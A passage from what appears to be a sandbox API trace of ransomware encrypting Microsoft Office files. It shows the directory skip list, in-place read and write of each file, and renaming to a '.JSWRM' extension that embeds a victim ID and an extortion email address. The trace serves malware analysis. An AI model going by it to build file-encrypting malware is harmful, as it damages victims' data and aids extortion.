(lpString1="OUTLOOK.HXS", lpString2="..") returned 1 [0115.887] lstrcmpiW (lpString1="OUTLOOK.HXS", lpString2="...") returned 1 [0115.887] lstrcmpiW (lpString1="OUTLOOK.HXS", lpString2="windows") returned -1 [0115.887] lstrcmpiW (lpString1="OUTLOOK.HXS", lpString2="recovery") returned -1 [0115.887] lstrcmpiW (lpString1="OUTLOOK.HXS", lpString2="perflogs") returned -1 [0115.887] lstrcmpiW (lpString1="OUTLOOK.HXS", lpString2="documents and settings") returned 1 [0115.887] lstrcmpiW (lpString1="OUTLOOK.HXS", lpString2="$RECYCLE.BIN") returned 1 [0115.887] lstrcmpiW (lpString1="OUTLOOK.HXS", lpString2="system volume information") returned -1 [0115.887] lstrcmpiW (lpString1="OUTLOOK.HXS", lpString2="msocache") returned 1 [0115.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0115.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLOOK.HXS", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0115.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLOOK.HXS", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLOOK.HXS", lpUsedDefaultChar=0x0) returned 11 [0115.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0115.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0115.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLOOK.HXS", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0115.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLOOK.HXS", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLOOK.HXS", lpUsedDefaultChar=0x0) returned 11 [0115.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0115.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0115.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0115.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0115.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0115.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0115.887] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\OUTLOOK.HXS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\outlook.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0115.888] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=676746) returned 1 [0115.888] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0115.888] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0116.025] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.025] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0116.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0116.026] CloseHandle (hObject=0x238) returned 1 [0116.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0116.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0116.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0116.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0116.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0116.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0116.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0116.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0116.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0116.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0116.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0116.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0116.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0116.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0116.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0116.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0116.026] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\OUTLOOK.HXS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\outlook.hxs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\OUTLOOK.HXS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\outlook.hxs.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0116.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0116.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0116.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0116.028] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xa284551, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xa284551, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xa3dba42, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x281, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="OUTLOOK_COL.HXC", cAlternateFileName="OUTLOO~1.HXC")) returned 1 [0116.028] lstrcmpiW (lpString1="OUTLOOK_COL.HXC", lpString2=".") returned 1 [0116.028] lstrcmpiW (lpString1="OUTLOOK_COL.HXC", lpString2="..") returned 1 [0116.028] lstrcmpiW (lpString1="OUTLOOK_COL.HXC", lpString2="...") returned 1 [0116.028] lstrcmpiW (lpString1="OUTLOOK_COL.HXC", lpString2="windows") returned -1 [0116.028] lstrcmpiW (lpString1="OUTLOOK_COL.HXC", lpString2="recovery") returned -1 [0116.028] lstrcmpiW (lpString1="OUTLOOK_COL.HXC", lpString2="perflogs") returned -1 [0116.028] lstrcmpiW (lpString1="OUTLOOK_COL.HXC", lpString2="documents and settings") returned 1 [0116.028] lstrcmpiW (lpString1="OUTLOOK_COL.HXC", lpString2="$RECYCLE.BIN") returned 1 [0116.028] lstrcmpiW (lpString1="OUTLOOK_COL.HXC", lpString2="system volume information") returned -1 [0116.028] lstrcmpiW (lpString1="OUTLOOK_COL.HXC", lpString2="msocache") returned 1 [0116.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0116.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLOOK_COL.HXC", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0116.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLOOK_COL.HXC", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLOOK_COL.HXC", lpUsedDefaultChar=0x0) returned 15 [0116.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0116.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0116.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLOOK_COL.HXC", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0116.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLOOK_COL.HXC", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLOOK_COL.HXC", lpUsedDefaultChar=0x0) returned 15 [0116.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0116.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0116.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0116.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0116.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0116.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0116.029] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\OUTLOOK_COL.HXC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\outlook_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0116.030] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=641) returned 1 [0116.030] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x280) returned 0x20b1f8 [0116.030] ReadFile (in: hFile=0x238, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x280, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x280, lpOverlapped=0x0) returned 1 [0116.034] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.034] WriteFile (in: hFile=0x238, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x280, lpOverlapped=0x0) returned 1 [0116.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0116.034] CloseHandle (hObject=0x238) returned 1 [0116.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0116.034] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0116.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0116.034] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0116.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0116.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0116.034] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0116.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0116.034] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0116.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0116.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0116.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0116.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0116.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0116.034] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\OUTLOOK_COL.HXC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\outlook_col.hxc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\OUTLOOK_COL.HXC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\outlook_col.hxc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0116.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0116.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0116.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0116.035] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xa25e3e5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xa25e3e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xa2f6cec, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xcf, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="OUTLOOK_COL.HXT", cAlternateFileName="OUTLOO~1.HXT")) returned 1 [0116.036] lstrcmpiW (lpString1="OUTLOOK_COL.HXT", lpString2=".") returned 1 [0116.036] lstrcmpiW (lpString1="OUTLOOK_COL.HXT", lpString2="..") returned 1 [0116.036] lstrcmpiW (lpString1="OUTLOOK_COL.HXT", lpString2="...") returned 1 [0116.036] lstrcmpiW (lpString1="OUTLOOK_COL.HXT", lpString2="windows") returned -1 [0116.036] lstrcmpiW (lpString1="OUTLOOK_COL.HXT", lpString2="recovery") returned -1 [0116.036] lstrcmpiW (lpString1="OUTLOOK_COL.HXT", lpString2="perflogs") returned -1 [0116.036] lstrcmpiW (lpString1="OUTLOOK_COL.HXT", lpString2="documents and settings") returned 1 [0116.036] lstrcmpiW (lpString1="OUTLOOK_COL.HXT", lpString2="$RECYCLE.BIN") returned 1 [0116.036] lstrcmpiW (lpString1="OUTLOOK_COL.HXT", lpString2="system volume information") returned -1 [0116.036] lstrcmpiW (lpString1="OUTLOOK_COL.HXT", lpString2="msocache") returned 1 [0116.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0116.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLOOK_COL.HXT", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0116.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLOOK_COL.HXT", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLOOK_COL.HXT", lpUsedDefaultChar=0x0) returned 15 [0116.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0116.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0116.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLOOK_COL.HXT", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0116.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLOOK_COL.HXT", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLOOK_COL.HXT", lpUsedDefaultChar=0x0) returned 15 [0116.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0116.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0116.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0116.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0116.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0116.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0116.036] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\OUTLOOK_COL.HXT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\outlook_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0116.037] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=207) returned 1 [0116.037] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c0c8 [0116.037] ReadFile (in: hFile=0x238, lpBuffer=0x24c0c8, nNumberOfBytesToRead=0xc0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c0c8*, lpNumberOfBytesRead=0x345e89c*=0xc0, lpOverlapped=0x0) returned 1 [0116.038] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.038] WriteFile (in: hFile=0x238, lpBuffer=0x24c0c8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c0c8*, lpNumberOfBytesWritten=0x345e898*=0xc0, lpOverlapped=0x0) returned 1 [0116.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0116.038] CloseHandle (hObject=0x238) returned 1 [0116.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0116.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0116.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0116.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0116.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0116.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0116.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0116.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0116.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0116.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0116.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0116.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0116.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0116.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0116.039] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\OUTLOOK_COL.HXT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\outlook_col.hxt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\OUTLOOK_COL.HXT.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\outlook_col.hxt.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0116.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0116.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0116.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0116.040] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9c1bf71, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9c1bf71, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9c42224, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x72, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="OUTLOOK_F_COL.HXK", cAlternateFileName="OUTLOO~2.HXK")) returned 1 [0116.040] lstrcmpiW (lpString1="OUTLOOK_F_COL.HXK", lpString2=".") returned 1 [0116.040] lstrcmpiW (lpString1="OUTLOOK_F_COL.HXK", lpString2="..") returned 1 [0116.040] lstrcmpiW (lpString1="OUTLOOK_F_COL.HXK", lpString2="...") returned 1 [0116.040] lstrcmpiW (lpString1="OUTLOOK_F_COL.HXK", lpString2="windows") returned -1 [0116.040] lstrcmpiW (lpString1="OUTLOOK_F_COL.HXK", lpString2="recovery") returned -1 [0116.040] lstrcmpiW (lpString1="OUTLOOK_F_COL.HXK", lpString2="perflogs") returned -1 [0116.040] lstrcmpiW (lpString1="OUTLOOK_F_COL.HXK", lpString2="documents and settings") returned 1 [0116.040] lstrcmpiW (lpString1="OUTLOOK_F_COL.HXK", lpString2="$RECYCLE.BIN") returned 1 [0116.040] lstrcmpiW (lpString1="OUTLOOK_F_COL.HXK", lpString2="system volume information") returned -1 [0116.040] lstrcmpiW (lpString1="OUTLOOK_F_COL.HXK", lpString2="msocache") returned 1 [0116.040] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0116.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLOOK_F_COL.HXK", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0116.040] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0116.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLOOK_F_COL.HXK", cchWideChar=17, lpMultiByteStr=0x241358, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 